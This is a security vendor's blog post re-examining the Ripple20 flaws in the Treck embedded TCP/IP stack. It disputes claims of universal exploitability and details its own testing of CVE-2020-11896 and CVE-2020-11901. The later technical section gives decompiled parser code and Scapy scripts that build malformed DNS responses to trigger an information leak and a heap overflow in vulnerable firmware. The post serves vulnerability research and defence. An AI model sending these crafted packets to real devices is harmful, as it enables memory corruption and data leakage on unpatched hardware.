Finite State Blog

The Aftershock of Ripple20 - Finite State

Written by Stephanie | Oct 12, 2020 2:40:15 PM

When the Ripple20 vulnerabilities were announced, Finite State set out to verify their most severe effects in order to address the most critical threats facing our customers and industry partners. To our surprise, despite variations in release date, architecture, and operating system, we did not observe remote code execution vulnerabilities on any of the devices we tested other than the two devices JSOF used in its demonstrations. This was particularly concerning in light of JSOF’s assertions that “Ripple20 poses a significant risk from the devices still in use” and that “in all scenarios, an attacker can gain complete control over the targeted device remotely, with no user interaction required.” These statements lead readers to believe that attackers can develop a universal exploit to target and control “hundreds of millions of devices (or more).” Given the response we were seeing from the community, we decided to dig deeper into the vulnerabilities and release our findings to better inform our customers and the community at large.

Since then, we have gained new insights, which we hope will further clarify our approach and provide an even deeper understanding of our results and processes. We will expand upon our findings here in order to provide the greatest transparency and to best serve our community.

Summary of expanded findings:

  • Our research has shown that most devices we tested that utilize the Treck stack are not affected by the disclosed remote code execution vulnerabilities, bringing into question the true widespread impact of Ripple20.
  • Due to variations in compiler options, instruction set, architecture, memory layout, and other configuration settings, an attacker cannot simply develop a universal exploit for all devices affected by Ripple20. Given how significant the variations are across devices, it is highly unlikely that an attacker would even attempt to do so, and to suggest otherwise is both inaccurate and irresponsible. 
  • The likelihood of attackers launching wide-scale attacks to exploit Ripple20 vulnerabilities is low, because customized exploits will need to be developed for each device and software version, which would be too costly an investment.
  • Treck confirmed that exploitation of CVE-2020-11896 was dependent upon an error checking macro being disabled. Almost all vendors had the macro enabled. This further reinforces that many devices are not remotely exploitable.
  • By developing a new approach that was not part of the JSOF disclosure, we were able to demonstrate a heap overflow using CVE-2020-11901, which could provide the opportunity for remote code execution (RCE). This is an update to the initial results described for the HP and Net+OS firmware in our whitepaper. Notably, we demonstrated that the exploitability of CVE-2020-11901 is highly dependent upon the platform, and a unique exploit payload would need to be developed for each target.

Background

Our client base includes both asset owners and device manufacturers who had concerns about Ripple20 and its impact. Our platform can analyze these types of issues in order to ensure that our customers understand exactly how vulnerabilities affect their devices, giving them the information that they need to issue security fixes, if necessary.

We actively investigated these vulnerabilities to save our customers time and resources, understanding that attempting to patch devices that were ostensibly affected could slow down their production and potentially cause more damage. We focused on CVE-2020-11896 and CVE-2020-11901 because they were the only two remote code execution (RCE) vulnerabilities presented in the JSOF disclosure and had the greatest severity.

We first needed to identify which of our clients’ devices were impacted by Ripple20. Our team at Finite State is focused on performing vulnerability analysis at scale across hundreds of thousands of different embedded devices. Basically, anything we do needs to work across dozens of instruction set architectures, operating systems, and chipsets. That positioned us well to add another detection capability, Focused Emulation, that could reliably test for the actual vulnerable code condition across our entire library of devices. In the process, we found 20 devices that had the Treck stack embedded within them, and those devices formed the basis of our research and results.

The whitepaper can be found on our website.

Post Whitepaper Release

We released our whitepaper detailing our findings on September 29, 2020. That paper was developed independently using only black-box testing techniques due to not having access to Treck source code or patches. Since its release, we have had discussions with JSOF, Treck, and our customers, which raised questions that we felt were our duty to address. We conducted additional testing and, in turn, we have a greater understanding of the vulnerabilities and the influence device-level configurations have on the resulting effect.

In discussions with our team, Treck confirmed that exploitation results for CVE-2020-11896 were different based on an error checking macro that vendors could choose to enable or not. Defining the error checking macro enabled the “guard code” that was discussed and depicted in our whitepaper. All devices we’ve encountered, except for the Digi Connect ME 9210, had the guard code. Additionally, another macro could be enabled to support scattered data from the device driver, which completely removes the vulnerable code from the final binary. Thus, we believe CVE-2020-11896 is not nearly as widespread as the initial disclosure implies.

As stated in our original paper, exploitation of CVE-2020-11901 requires DNS to be enabled for the Treck stack. For the firmware that we analyzed, DNS was not enabled and, therefore, the vulnerable code was not present. Even when it was enabled, the Treck DNS code imposed additional constraints which had to be overcome for successful exploitation. Again, the presence, usability, and reachability of the DNS code will vary based on device configurations.

Later in this blog post, we describe the technical details of our expanded findings. We recognize that continuous validation and testing is always necessary. As more public information becomes available, we are willing to reassess our research. Our priority is to ensure that the community at large has the information and tools that they need to address these vulnerabilities in a way that is commensurate with their scope and magnitude.

The Issues We Observed

We agree with JSOF that there are real vulnerabilities that need to be fixed in the Treck stack, and efforts have been made to address them. Treck has been working closely with their customers to help address their affected devices, according to their representatives. They have communicated to their customers the different CVSS ratings that resulted based on certain configurations. Treck has also stated that their patches were tested before being released to their customers. Finite State does not have access to Treck’s source code or patches; therefore, we cannot directly comment on the quality, impact, or effectiveness of their specific patches.

The reporting of these vulnerabilities by JSOF, however, created several issues. First, these vulnerabilities were correlated to a “version” of the Treck stack and reported as such via NVD, ICS CERT, and other vulnerability advisory sources, leading to incorrect assumptions which fueled a misguided community response.

The Treck stack is distributed as source code, giving OEMs the flexibility to modify the code and select the pieces that enable stack functionality. The stack can also target any architecture and device, which significantly increases the complexity of analysis. This means that the typical, naive approach of searching for a version string or matching a YARA signature to detect the Treck stack will often be incorrect, because the version string is sometimes inaccurate or not even present in the final firmware. Consequently, security teams must manually test each device for the possible vulnerability, which is both disruptive and unscalable.

Once the vulnerability was disclosed, it became incumbent upon device manufacturers and software vendors to verify the applicability of the vulnerability. Given the widespread impact of what was reported, it would have been very hard for anyone outside of our team to run this type of large scale analysis. The challenge is that, based on the feedback that we received from our customers, JSOF didn’t provide any tooling for detecting the issue within code or binaries, and the details in their report made it very difficult to test for the vulnerability. As a result, security teams had to develop intricate fixes for the vulnerability on their own to the best of their abilities and/or coordinate with Treck for fixes. Then, they had to ensure that their final device configurations really fixed the problems and didn’t introduce new vulnerabilities. Due to the publicity around this vulnerability and its severity, this needed to be done quickly to ensure their customers felt secure.

Second, JSOF’s disclosure on the Ripple20 website reported that the vulnerable Treck library, and thus the Ripple20 vulnerabilities, “affect hundreds of millions of devices (or more).” Our research indicates that the extent of its impact is markedly exaggerated. Because varying architectures, platforms, and compilers produce different behaviors, exploitation vectors, and resulting effects, it is critical to test each device individually to determine whether it is truly vulnerable. It is important for the community at large to be equipped with the proper information and tooling to verify new vulnerabilities so that they can make informed and appropriate security decisions for their products and organizations. Moreover, it is essential that we are able to quickly and accurately verify these issues across multiple versions of affected devices.

Finally, on its Ripple20 website, JSOF states that “Ripple20 poses a significant risk from the devices still in use” and goes on to claim that “in all scenarios, an attacker can gain complete control over the targeted device remotely, with no user interaction required.” Anyone reading this could easily conclude that attackers can develop a universal exploit to target and control “hundreds of millions of devices (or more),” which is not the case. So far, JSOF has presented two public RCE demonstrations: one on a Schneider Electric APC UPS device and one on a Digi Connect ME 9210 device. Given the varying configurations and complexities across impacted devices, attackers cannot simply develop a universal exploit to rule them all, and we feel it is important and responsible to clarify this.

The way these issues are framed matters. The likelihood of attackers launching wide-scale attacks to exploit Ripple20 vulnerabilities is low because customized exploits will need to be developed for each impacted device and software version. Attackers would need to target each device independently. It’s not that they can’t do that. For many devices running an outdated Treck stack, a determined adversary could find an infiltration point; however, the amount of investment required to exploit the vulnerability is generally not worth the attacker’s time. The widespread impact is further reduced by the proportion of unaffected devices that are running Treck. Marketing Ripple20 as a greater risk than it is without providing an accessible verification method creates undue panic.

The Bottom Line: Don’t Panic

One of the major factors that went into the publication of our whitepaper was the response we saw to Ripple20: namely, widespread patching by third-party vendors without verifying the effects of these vulnerabilities. These vendors attempted to develop patches, sometimes independently from Treck, for all of the devices that were presumed to be affected by this highly publicized vulnerability. We saw two problems: devices that were unaffected were patched unnecessarily, and in at least one case, because these vendors did not adequately verify their patches, new vulnerabilities were introduced in the process. These unintended consequences are completely avoidable if security teams are able to verify these vulnerabilities before attempting to patch them.

It is important for the disclosing party to realize that they need to serve two audiences: the end users of the devices who may be affected by the vulnerability and the manufacturers of the products who are best armed to fix the problem. For deeply embedded, disruptive vulnerabilities like Ripple20, it would be best for the reporters to release two classes of tools for detecting the vulnerabilities: one for the end users (e.g., a network scanning tool) and one for the manufacturers (e.g., a source code or binary scanning tool). This would ensure that the community has the proper tooling to test and verify without wasting time digging deeply into highly intricate vulnerabilities.

As we emphasized in our whitepaper, the current way that we evaluate and report vulnerabilities is not well suited to IoT and embedded devices. We as a community should be pushing for a better system. We also need to find more scalable ways to verify and respond to reported vulnerabilities, especially high-profile vulnerabilities. Manufacturers should be using DevSecOps tools and firmware analysis tools (such as the Finite State Platform) to proactively find vulnerabilities in their first- and third-party code. When a new vulnerability is reported, they should use those tools to confirm the details of the problem before responding with a generic fix. In the meantime, we need to be doing our due diligence to collectively verify these vulnerabilities and ensure the community has the necessary information and capabilities to do so.

We’ll now dive into the technical details of the additional research that we performed since releasing our whitepaper.

CVE-2020-11901 Vulnerabilities

JSOF’s white paper and Black Hat presentation on CVE-2020-11901 detailed three vulnerabilities:

  • Vulnerability #1: Read Out-Of-Bounds (OOB)
  • Vulnerability #2: Integer Overflow
  • Vulnerability #3: Bad RDLENGTH

Finite State’s Focused Emulation solution has implemented detection capabilities for Vulnerability #1 (Read OOB) and Vulnerability #2 (Integer Overflow), and we demonstrated these capabilities on numerous firmware images in our client portfolio. None of these vulnerabilities are present when DNS is disabled in the Treck stack. In verifying these vulnerabilities, we followed JSOF’s CVE-2020-11901 white paper. For completeness, the firmware we evaluated did not contain the bad RDLENGTH variant or the memory leak artifact, so we did not evaluate Vulnerability #3 or the memory leak artifact. Scapy examples are included for convenience, but changes may be necessary depending on your device’s stack.

Vulnerability #1 Read OOB

This Read OOB vulnerability results in an information leak. In the firmware corpus that Finite State tested, the Read OOB existed in two pre-patched firmware images that had DNS enabled. The vulnerability lies in the tfDnsLabelToAscii function (Figure 1), which converts DNS labels to an ASCII string and does not perform proper bounds checking when populating the destination buffer (the result variable). If the exchange name of a DNS MX record is not terminated by a zero byte, the function keeps reading (into the variable ch) beyond the end of the packet until it reaches one. The amount leaked depends heavily on the contents of memory, because leaked data resembling compression pointers or zero bytes will interrupt the leak. The leaked data can then be obtained by resolving the MX hostname (Figure 2).
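To make the over-read concrete, here is a minimal Python model of the byte-by-byte walk in Figure 1. It is a sketch, not Treck’s code: the function name is hypothetical, `memory` stands in for the packet followed by whatever bytes happen to sit after it, and for simplicity the model stops at a pointer-like length byte instead of following it.

```python
def unbounded_label_walk(memory: bytes, start: int) -> bytes:
    """Model (not Treck's code) of Figure 1's byte-by-byte label walk.

    The loop bound below only keeps the model inside `memory`; the C loop has
    no bound at all, which is the bug being illustrated.
    """
    out = bytearray()
    i = start
    remaining = 0  # bytes left in the current label
    while i < len(memory):
        ch = memory[i]
        if ch == 0:
            break  # a zero byte anywhere ends the walk
        if remaining == 0:
            if ch & 0xC0:
                break  # simplification: stop at a pointer-like byte instead of following it
            remaining = ch  # length byte starts a new label
            if out:
                out += b"."
        else:
            out.append(ch)  # label data is copied byte by byte
            remaining -= 1
        i += 1
    return bytes(out)


# The Figure 2 exchange name with its terminator replaced by 0x3f,
# followed by hypothetical bytes that happen to sit after the packet.
packet = b"\x03www\x08example2\x03com\x3f"
adjacent = b"SECRET-KEY\x00more"
print(unbounded_label_walk(packet + adjacent, 0))  # b'www.example2.com.SECRET-KEY'
```

The final 0x3f announces a 63-byte label, so the walk copies whatever follows the packet until it hits the zero byte.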

Figure 1: Pseudo-code for tfDnsLabelToAscii

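#include <stdbool.h>
#include <stddef.h>

typedef unsigned int uint;

/* Decompiled logic of tfDnsLabelToAscii. Bytes are read as unsigned so that
 * compression-pointer bytes (0xc0 and above) decode as intended.
 * Neither i (read position) nor j (write position) is ever bounds-checked. */
int tfDnsLabelToAscii(unsigned char *exchange, char *result, unsigned char *pktdata)
{
 unsigned char ch;
 uint last_ch;
 uint j = 0;            /* write index into result */
 uint i = 0;            /* read index into exchange */
 uint label_size = 0;   /* bytes left in the current label */
 do {
   /* No check against the end of the packet: without a zero byte, the loop
      keeps reading past it (Vulnerability #1, Read OOB). */
   ch = exchange[i];
   last_ch = (uint)ch;
   if (ch == 0) {
     result[j] = '\0';
     break;
   }
   if (label_size == 0) {
     if ((ch & 0xc0) == 0) {
       /* Length byte: start a new label, separated by '.' */
       i = (i + 1) & 0xffff;
       label_size = last_ch;
       if (j != 0) {
         result[j] = '.';
         j = (j + 1) & 0xffff;
       }
     }
     else {
       if (result == NULL) {
         last_ch = 0xde;
         break;
       }
       /* Compression pointer: jump to an offset from the start of the DNS message */
       exchange = pktdata + exchange[i+1] + (last_ch & ~0xc0) * 0x100;
       i = label_size;   /* label_size is 0 here, so reading restarts at the target */
     }
     continue;
   }
   /* j is never compared with the size of result, so an undersized
      buffer is overflowed (the heap overflow under Vulnerability #2). */
   result[j] = ch;
   j = (j + 1) & 0xffff;
   i = (i + 1) & 0xffff;
   label_size = (label_size - 1) & 0xff;
 } while (true);

 result[j] = '\0';
 return last_ch;
}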

 

Figure 2: Scapy code for the CVE-2020-11901 Information Leak

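from scapy.all import DNS, DNSRRMX, IP, UDP, Raw, raw

# Serialize an MX answer, then replace the exchange name's terminating zero
# byte with 0x3f: a length byte for a 63-byte label that is not in the packet.
leak = raw(DNSRRMX(rrname='www.example.com',
                   type="MX",
                   rdlen=None,
                   exchange=b'www.example2.com'))[:-1] + b'\x3f'
full_pkt = (IP(src='192.168.1.66', dst='192.168.0.50') / UDP() /
            DNS(opcode="IQUERY", qr=1, aa=1, rd=0, qdcount=0, ancount=1) /
            Raw(leak))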
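The slice-and-append step in Figure 2 can be checked without Scapy. The sketch below hand-encodes a DNS name in RFC 1035 wire format (length-prefixed labels ending in a zero byte); both helper names are hypothetical. Because the exchange name is the last field of the serialized MX record, dropping the final byte removes its terminator, and appending 0x3f turns that position into a length byte announcing a 63-byte label that is not in the packet. The total length is unchanged, so the rdlen computed during serialization remains consistent.

```python
def encode_dns_name(name: str) -> bytes:
    """Encode a dotted name as RFC 1035 length-prefixed labels plus a zero byte."""
    out = bytearray()
    for label in name.split("."):
        data = label.encode("ascii")
        if not 0 < len(data) <= 63:
            raise ValueError(f"invalid label: {label!r}")
        out.append(len(data))
        out += data
    out.append(0)  # root label terminates the name
    return bytes(out)


def unterminated_name(name: str, claimed_len: int = 0x3F) -> bytes:
    """Swap the terminating zero byte for a length byte with no label data behind it."""
    return encode_dns_name(name)[:-1] + bytes([claimed_len])


print(encode_dns_name("www.example2.com"))    # b'\x03www\x08example2\x03com\x00'
print(unterminated_name("www.example2.com"))  # b'\x03www\x08example2\x03com?' (0x3f prints as '?')
```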

Vulnerability #2 Integer Overflow

In the firmware corpus that we tested, the integer overflow existed in two pre-patched firmware images that had DNS enabled. Leveraging this vulnerability, we developed a new approach, not part of the JSOF disclosure, to demonstrate a heap overflow that could potentially lead to RCE.

The integer overflow vulnerability lies in how the tfDnsExpLabelLength function pre-parses the label to determine its decompressed size (Figure 4). A buffer of that size is then allocated and passed to the tfDnsLabelToAscii function to store the fully decompressed label. Again following JSOF’s white paper, we crafted a DNS packet that would trigger the integer overflow.

The key element of the DNS packet is the matrix, which is what triggers the integer overflow. The matrix is an encoded representation of the domain name; an example is shown in Figure 3.

Figure 3: Example matrix configuration from JSOF’s Black Hat USA 2020 presentation

We developed a script to generate matrix configurations of any desired size. We used this script to determine the minimum matrix size that still performed the integer overflow while maximizing the space left in the DNS packet for the eventual heap overflow payload. We then wrapped the matrix in a DNS packet with an MX record and sent the malicious packet to the Treck DNS stack to observe the results.

Figure 4: MX processing code vulnerable to overflowing labelLength

if (flags == 0xf) {
   if (record_type == 0xf) {
       addr_info = tfDnsAllocAddrInfo();
       if (addr_info != NULL) {
           memcpy(&addr_info->ai_addrlen, resourceRecordAfterNamePtr+10, 2);
           labelLength = tfDnsExpLabelLength(resourceRecordAfterNamePtr+0xc,
                                       dnsHeaderPtr);
           addr_info->ai_canonname = NULL;
           if (labelLength != 0) {
               asciiPtr = tfGetRawBuffer(labelLength);
               addr_info->ai_canonname = asciiPtr;
               if (asciiPtr != NULL) {
                   tfDnsLabelToAscii(resourceRecordAfterNamePtr+0xc,
                               asciiPtr, dnsHeaderPtr);
...

At this point, providing the overflow matrix to tfDnsExpLabelLength truncated the returned length, not through an integer overflow but through a bitwise operation (“& 0xFFFF”) that has the same effect. A buffer of the truncated size is allocated using tfGetRawBuffer, and this undersized heap buffer should then be overflowed by the subsequent call to tfDnsLabelToAscii. However, we were surprised to observe that the heap overflow did not occur on this firmware.
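The effect of the mask can be sketched in a few lines of Python. The helper names and the example length are hypothetical; the point is only that any computed length of 65,536 or more wraps around to a small allocation size, while tfDnsLabelToAscii still attempts to write the full decompressed name.

```python
def masked_allocation(expanded_len: int) -> int:
    """Model of a computed label length masked to 16 bits ('& 0xFFFF')."""
    return expanded_len & 0xFFFF


def unallocated_bytes(expanded_len: int) -> int:
    """Bytes of the fully decompressed name that do not fit the masked allocation."""
    return expanded_len - masked_allocation(expanded_len)


# Hypothetical decompressed length just past the 16-bit boundary.
example_len = 0x10000 + 62
print(masked_allocation(example_len))  # 62
print(unallocated_bytes(example_len))  # 65536
```

Lengths below 65,536 pass through unchanged, which is why the attack needs a matrix whose decompressed size crosses that boundary.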

Note: The following analysis is based on our research and details information that was not present in JSOF’s whitepaper or public presentations.

So far, we had confirmed that the integer overflow exists, but the heap overflow was not exercised. The heap overflow did not occur because the Treck code limits DNS packets to a maximum of 1460 bytes, while the 64×19 matrix alone requires 1216 bytes. The remaining 244 bytes of the DNS packet, which must also hold the header and questions, do not provide enough data to overflow the 3510-byte buffer allocated by tfGetRawBuffer. Successful heap overflow therefore requires modifying the exploitation technique.
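The packet-budget argument above is plain arithmetic; as a sketch, with the constants taken from the text and the names hypothetical:

```python
MAX_DNS_PACKET = 1460      # Treck's DNS packet size limit, as reported above
MATRIX_ROWS, MATRIX_COLS = 19, 64
ALLOCATION = 3510          # bytes allocated by tfGetRawBuffer for the 64x19 matrix


def bytes_left_after_matrix(max_packet: int, rows: int, cols: int) -> int:
    """Packet bytes left once a rows x cols matrix (one byte per cell) is in place.

    The DNS header and question still have to fit in this space, so the
    result is an upper bound on what is available for a payload.
    """
    return max_packet - rows * cols


left = bytes_left_after_matrix(MAX_DNS_PACKET, MATRIX_ROWS, MATRIX_COLS)
print(left)                # 244
print(left >= ALLOCATION)  # False
```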

The first modification to the technique was to craft a malicious packet with only one question, in contrast to JSOF’s approach of using two. Placing the matrix in the label of that single question caused tfDnsLabelLength to exit prematurely when it hit the zero byte on the left side of the matrix. To fix this, we prefixed the matrix with a “jump” byte that forces tfDnsLabelLength to traverse the right side of the matrix and thus bypass the zero byte on the left side. Table 1 illustrates a simple example matrix with the preceding jump byte (the leading 0f) that bypasses the zero byte (the 00 at the start of the fourth matrix row).

Table 1: Simple example matrix with the leading “jump” byte (with offsets for Figure 5)

offset  jump  matrix bytes
0x0c    0f
0x0d          0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
0x1d          0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
0x2d          0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
0x3d          00 0e 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
0x4d          c0 0d 0d 0e 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
0x5d          c0 0e c0 0f 0b 0c 0d 0e 0f 0f 0f 0f 0f 0f 0f 0f
0x6d          c0 10 c0 11 c0 12 c0 13 07 08 09 0a 0b 0c 0d 0e
0x7d          c0 14 c0 15 c0 16 c0 17 c0 18 c0 19 c0 1a c0 1b
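To see why the jump byte matters, the sketch below follows labels and compression pointers the way a generic RFC 1035 decompressor would and counts label bytes. It is not Treck’s tfDnsExpLabelLength (whose exact accounting, for example of separators, we are not reproducing), and the function and constant names are hypothetical. Placing the Table 1 matrix after a 12-byte DNS header, with and without the leading 0x0f, reproduces the two behaviors described above.

```python
from typing import Tuple

# Table 1 matrix, row by row (16 bytes per row), without the jump byte.
TABLE_1 = bytes.fromhex(
    "0f" * 16
    + "0f" * 16
    + "0f" * 16
    + "000e" + "0f" * 14
    + "c00d0d0e" + "0f" * 12
    + "c00ec00f0b0c0d0e" + "0f" * 8
    + "c010c011c012c013" + "0708090a0b0c0d0e"
    + "c014c015c016c017c018c019c01ac01b"
)
DNS_HEADER = bytes(12)  # placeholder header; only its 12-byte size matters here


def expanded_label_bytes(packet: bytes, start: int, max_pointers: int = 256) -> Tuple[int, int]:
    """Walk a (possibly compressed) DNS name; return (label bytes, label count)."""
    pos, total, labels, pointers = start, 0, 0, 0
    while True:
        length = packet[pos]
        if length == 0:  # root label: end of name
            return total, labels
        if (length & 0xC0) == 0xC0:  # compression pointer: 14-bit message offset
            pointers += 1
            if pointers > max_pointers:
                raise ValueError("pointer loop suspected")
            pos = ((length & 0x3F) << 8) | packet[pos + 1]
            continue
        if length & 0xC0:
            raise ValueError(f"unsupported label type 0x{length:02x}")
        total += length
        labels += 1
        pos += 1 + length


without_jump = DNS_HEADER + TABLE_1
with_jump = DNS_HEADER + b"\x0f" + TABLE_1
print(expanded_label_bytes(without_jump, 12))  # (45, 3): stops at the left-side 00
print(expanded_label_bytes(with_jump, 12))     # (1420, 98): traverses the right side
```

In this model, the MX exchange from Figure 5 (b'\x07payload\xc0\x1c') enters the same right-side path through its pointer to 0x1c, so the 128 matrix bytes expand to 1,405 label bytes. The 64×19 overflow matrix applies the same idea at a size where the total no longer fits in 16 bits.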

 

The Scapy code in Figure 5 represents the final DNS packet, with the jump byte ‘\x0f’ used with the simple matrix above. For the overflow matrix, instead use ‘\x3f’ for the jump byte.

Figure 5: Scapy code for the CVE-2020-11901 Integer Overflow (for simple matrix)

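from scapy.all import DNS, DNSRRMX, IP, UDP, Raw, raw

# matrix_bytes: the Table 1 matrix (or the 64x19 overflow matrix) as bytes; not defined here
dns_pkt = raw(DNS(qr=1, aa=1, rd=1, qdcount=1, ancount=1))
# Question: jump byte (\x0f here, \x3f for the overflow matrix) + matrix, QTYPE 5 (CNAME), QCLASS 1 (IN)
qr_raw = b'\x0f' + matrix_bytes + b'\x00\x05\x00\x01'
# Answer: MX whose exchange is "payload" followed by a pointer to offset 0x1c
an_raw = raw(DNSRRMX(rrname=b'www.example.com',
                     exchange=b'\x07payload\xc0\x1c', type="MX"))
full_dns_pkt = Raw(dns_pkt) / Raw(qr_raw) / Raw(an_raw)
full_pkt = (IP(src='192.168.1.66', dst='192.168.0.50') /
            UDP() / Raw(full_dns_pkt))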

We were still left with an allocation that was too large, so we had to make another modification to reduce the amount of the integer overflow. To do so, we chose the smallest overflow matrix, of size 64×19, and significantly reduced the overflow amount by strategically inserting another zero byte into the matrix. In the original 64×19 matrix, the zero byte is at location (0, 12), so we inserted another at (4, 12), which resulted in a smaller integer overflow and a subsequent tfGetRawBuffer allocation of only 62 bytes. Finally, this causes a heap overflow in tfDnsLabelToAscii of up to 835 bytes for variants that do not skip non-alphanumeric characters and 131 bytes for those that do, plus the malicious payload. This heap overflow vulnerability was present only in the two pre-patched firmware images that had DNS enabled. In addition to demonstrating it in emulation, we also demonstrated the heap overflow on pre-patched physical Digi hardware.

We revisited CVE-2020-11901 for the HP firmware that we had originally analyzed and presented in our whitepaper. We were able to demonstrate a heap overflow against it based on what we had learned from exploiting the Digi device; however, we needed to craft a DNS packet specific to the HP. The allocated buffer was also 62 bytes, but only 193 bytes of alphanumeric characters can be copied over, resulting in a 131-byte overflow, which could lead to RCE. Additional work is required to prove that an RCE effect can be achieved.
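The overflow amounts above follow from how many bytes the copy actually writes compared with the 62-byte allocation. The sketch below models a copier that optionally keeps only ASCII letters and digits; that filter is an assumption standing in for the variants that skip non-alphanumeric characters, whose exact character set we do not reproduce, and the terminating NUL is ignored to match the figures in the text. The function name is hypothetical.

```python
import string

ALNUM = frozenset((string.ascii_letters + string.digits).encode("ascii"))


def overflow_past_allocation(decoded: bytes, allocated: int, skip_non_alnum: bool) -> int:
    """Bytes written past the end of an `allocated`-byte buffer (0 if none)."""
    written = bytes(b for b in decoded if b in ALNUM) if skip_non_alnum else decoded
    return max(0, len(written) - allocated)


# 193 alphanumeric bytes into a 62-byte buffer, as in the HP case above.
print(overflow_past_allocation(b"A" * 193, 62, skip_non_alnum=True))  # 131
```

In this model, filtering drops the non-printable length and pointer bytes that the matrix contributes to the decompressed name, which is one way a skipping variant ends up with a much smaller overflow than a non-skipping one.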

Our research illustrates that the vulnerabilities present and their exploitation will vary per device. Exploitation is highly specific to the target, depending upon its architecture, operating system, memory layout, and configurations. For example, although the Schneider UPS, Digi, and HP firmware exhibit the CVE-2020-11901 heap overflow vulnerability, their heap grooming requirements will differ to reliably achieve an RCE. Thus, if exploitation is even possible, then a unique exploit will need to be developed to attack each device affected by Ripple20 vulnerabilities.